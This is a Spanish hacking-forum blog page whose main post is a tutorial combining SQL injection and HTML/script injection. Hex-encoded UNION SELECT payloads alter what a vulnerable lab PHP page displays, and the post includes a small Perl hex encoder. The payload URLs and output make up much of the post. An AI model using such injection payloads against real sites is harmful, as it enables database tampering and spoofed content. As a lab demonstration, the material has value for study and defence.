Yo

Mi nick es KozmiC,soy un joven argentino que vivo en España,donde esta desarrollando su poco de intelecto que tiene enfocado a la programación.



Aficiones que tengo,provablemente muchas pero las más activas actualmente son,la Programación de herramientas relacionadas con Red en PHP,el Parkour,el Tricking y claro que si chicas tan lindas como w0rm. (L)



Mi estilo musical,no es más que otro que el Metal,pero tengo que admitir que el Rap me apasiona,tal vez que sea por que la lirica es un mundo de pura poesía...no lo se.

¿Por Qué en DDLR?

Cualquier persona puede decir que "Dios de la Red" es una comunidad como otra,simplemente con una interfaz diferente.



Yo solo digo que DDLR,es más que una comunidad por que no solo se aprende aca,se gana experiencia como informatico/a y como persona.



Yo digo si a Dios de la Red y si a la Informática,A las vulnerabilidades y a los códigos en PHP. +1.

I am ...

Yo haciendo lo mejor que se... ^^



Blogroll: 18

[x] Agregar a kozmic

joker joker
gothicx gothicx
iquitoshack iquitoshack
papapitufo papapitufo
reactos reactos
kove kove
blackrusian blackrusian
ca0s ca0s
pride pride
linuxfer linuxfer
sm4ll sm4ll

... Ver todos

Perfil de kozmic

[x]Nick: kozmic
Rango: Newbie
País: ar
Visitas: 4232
Votos: 4
En Blogrolls: 11
Status: PM

Patrocinadores:


Anuncia aquí

SQL Injection + Cross Site Scripting = Fake or Fuck...

Publicado el 26/07/2010 12:07:00 en Seguridad.



SQL Injection + Cross Site Scripting = Fake

Bueno vuelvo con un nuevo aporte sobre un "video-demostración" de Xzite sobre SQLi+XSS.
Estube dandole vueltas al tema y me di cuenta que se puede manipular infomación de cierto modo,al tener una base de datos,un error en la base de datos y un script en php que saque de un "tutorial" o "demostración" de ka0x.

http://192.168.1.2/vuln/SQLi/users.php?id=1+and+1=2+union+select+1,2,3,4--

----------------------------
MySQL Injection TEST
D.O.M LABS

user_id: 1
username: 2
country: 4
----------------------------

Entones podemos leer el código fuente y copiar cierta parte para "imitar" el resulado.

<h2><center><u>MySQL Injection TEST<br>D.O.M LABS</u><br><br><font color='#FF0000'>user_id: </font>1<br><font color='#FF0000'>username: </font>2<br><font color='#FF0000'>country: </font>4<br>

Ahora toca ir modificando los resultados para nuestro favor,pero hay que tomar encuenta que los números que imprime es el 1,2 y 4.
Yo voy a imitar el código fuente desde el número 1,al final de la imitación colocare la etiqueta "<script>" para que oculte lo siguiente del código,asi parece un comentario.

666<br><font color='#FF0000'>username: </font>Diablo<br><font color='#FF0000'>country: </font>Hell<br><script>

Si ya han visto el video de Xzite,sabran que para pasar el código html "faked" deben pasarlo a hexagesimal y ante de imprimirlo en el link poner al principio "0x",sin comillas claro.

http://192.168.1.2/vuln/SQLi/users.php?id=1+and+1=2+union+select+0x3636363C62723E3C666F6E7420636F6C6F723D2723464630303030273E757365726E616D653A203C2F666F6E743E446961626C6F3C62723E3C666F6E7420636F6C6F723D2723464630303030273E636F756E7472793A203C2F666F6E743E48656C6C3C62723E3C7363726970743E,2,3,4--

Y les imprimiria:

----------------------------
MySQL Injection TEST
D.O.M LABS

user_id: 666
username: Diablo
country: Hell
----------------------------

Y bueno para la gente que le deje "paja" entrar en la consola,mysql ..etc
Les dejo un script bastante básico de conversión:

hex.pl
----------------------------
print "Enter string to encode:";
$str=<STDIN>;chomp $str;
$enc = encode($str); print "Hex Encoded value: 0x$enc\n";
sub encode{ #Sub to encode
@subvar=@_;
my $sqlstr =$subvar[0];
@ASCII = unpack("C*", $sqlstr);
foreach $line (@ASCII) {
$encoded = sprintf('%lx',$line);
$encoded_command .= $encoded;
}
return $encoded_command;
}
----------------------------

Bueno aqui finaliza mi "documentación" sobre SQL Injection y Cross Site Scripting dando a lugar un bonito fake,xploit o como deseen denominarlo.

Agradesco a Xzite por haber documentado en su blog el video de "SQLi+XSS by Xzite".
Y a l0ve por su gran documento de "Gran tutorial de inyecciones SQL (MySQL)" y de ahi fue donde saque el código del script en perl.
Tranquilos que no me olvido de los usuarios de DDLR.

Suerte chicos y chicas y espero que les halla gustado mi aporte.

Comentarios:

[x][x][x] d4rkdn4 dijo: se dice hexadecimal x)



[x][x][x] kozmic dijo: Bueno todos tenemos errores.
Pero el tema es que podemos hacer muchas cosas con SQL, algunos RFI`s otros XSS`s y more!!!


Para dejar un comentario Registrase o Iniciar sesión